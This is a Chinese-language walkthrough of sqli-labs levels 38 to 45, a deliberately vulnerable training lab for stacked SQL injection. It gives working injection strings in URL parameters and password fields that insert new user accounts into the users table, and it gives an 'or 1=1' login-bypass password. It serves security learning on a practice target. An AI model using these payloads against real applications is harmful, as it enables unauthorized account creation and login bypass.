sqli-labs level38-45 堆叠注入

第三十八关

堆叠注入，单引号闭合。
可以用联合查询注入，

1.png

但是题目是堆叠注入所以用堆叠。向users表中插入一条用户信息：
?id=1';insert into users(id,username,password) values (20,'d38','d38'); --+

2.png

查看users表：

3.png

之所以可以使用堆叠查询是因为这里：

4.png

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

第三十九关

堆叠注入，也可联合注入，整数型。

第四十关

堆叠，也可联合，单引号括号闭合。

第四十一关

堆叠，也可联合，整数型。

5.png

第四十二关

利用堆叠注入加一条用户信息，单引号闭合。我用hackbar试了半天不行，最后在页面的文本框中写的语句就可以了。这关要在密码框写SQL语句，因为在源码中看到，它会对提交的用户名使用函数进行过滤，过滤掉特殊字符。

6.png

username：admin
password：1’;insert into users values(42,’d42’,’d42’);#

7.png

提交之后是错误页面，点home返回，然后输入我们刚才插入的账号和密码，发现成功登陆了。

8.png

除了使用堆叠注入，还可以使用万能密码登录，同样是在密码框写sql语句：
username：admin
password：1’ or 1=1 #

9.png

第四十三关

和42关思路一样，利用堆叠注入加一条用户信息，只不过这关是单引号括号闭合。
username：admin
password：1’);insert into users values(43,’d43’,’d43’);#

10.png

第四十四关

和第42关做法一模一样，也是单引号闭合。
username：admin
password：1';insert into users values(44,'d44','d44');#

11.png

第四十五关

和43关一模一样
username：admin
password：1');insert into users values(45,'d45','d45')#

12.png